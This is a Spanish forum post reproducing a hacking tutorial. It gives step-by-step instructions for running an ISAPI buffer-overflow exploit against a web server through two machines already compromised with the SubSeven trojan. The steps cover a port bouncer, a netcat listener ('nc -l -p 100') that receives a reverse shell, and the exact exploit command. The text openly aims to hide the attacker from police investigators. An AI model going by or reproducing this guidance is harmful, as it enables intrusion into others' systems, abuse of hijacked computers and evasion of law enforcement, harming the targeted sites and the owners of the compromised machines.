Utilizar Un Shell De Msdos Remoto Para Ocultarse Lanzando Exploits

[fermarlop]

me resulto interezante el articulo que reproduzco a continuacion.
enlace :
http://www.cieloperros.da.ru/
http://www.terra.es/personal2/quickbasic/htm/shellremota.htm



Algunos usuarios de linux con nulo conocimiento de msdos (quizas crean que windows son solo ventanitas) piensan que es imposible hackear nada sin una shell de unix/linux ,que las shells remotas solo existen en ese mundo...

Bueno vamos a lanzar el exploit del ISAPI que ya conocemos con anonimato TOTAL usando ademas para despistar mas todavia 2 pcs distintos previamente hackeados y con el subseven metido.

En el 11.11.11.11 hacemos un bouncer con el subseven asi=

-en "input port" ------------>pon 80
-en "output host/ip" ponemos el OBJETIVO (www.hacked.com)
-en "output port" ---------->pon 80

Hecho esto nos desconectamos de ella.Esta maquina sera la encargada nada mas de ENVIAR el desbordamiento de buffer que provoca el xploit hacia la victima.

Ahora nos conectamos a nuestro otro subseven metido en 22.22.22.22

En esta maquina tendremos subido un NETCAT (nc.exe) tambien.

Abriremos un shell remoto con el comando del subseven: advanced/appredirect/enable app redirect

Ahora nos conectamos con el TELNET al puerto 23 de esa maquina 22.22.22.22 y...resultado=

Microsoft(R) Windows Millennium
(C)Copyright Microsoft Corp 1981-1999.

C:\>

Ahora TODO lo que hagamos es como si fuera nuestra propia maquina,por ello ahora dejaremos escuchando ahi el NETCAT poniendo...: nc -l -p 100 -vv y nos devolvera el mensaje que ya conocemos:

listening on [any] 100 ...

Pues ya tenemos todo preparado... Solo falta ejecutar el xploit en NUESTRO PC de esta forma:

xploit 11.11.11.11 80 22.22.22.22 100

Hemos enviado el desbordamiento de buffer A TRAVES del 11.11.11.11 hacia www.hacked.com especificando que la vuelta tiene que ir hacia 22.22.22.22, puerto 100... ;-) En la ventana de nuestro TELNET,tenemos ya un shell de www.hacked.com.

Cuando los estimados agentes de Delitos Informaticos investiguen los logs se frotaran las manos pensando,bien...tenemos 2 ips distintas..seguramente el jaker es la que ha lanzado el ataque..o el que lo ha recibido...pero lamentablemente haran 2 viajes en balde.

Hacedles un favor y que las dos maquinas esten bien lejos una de la otra...y en sitios chulos,mandadlos a Canarias y a Galicia p.ejm ;-)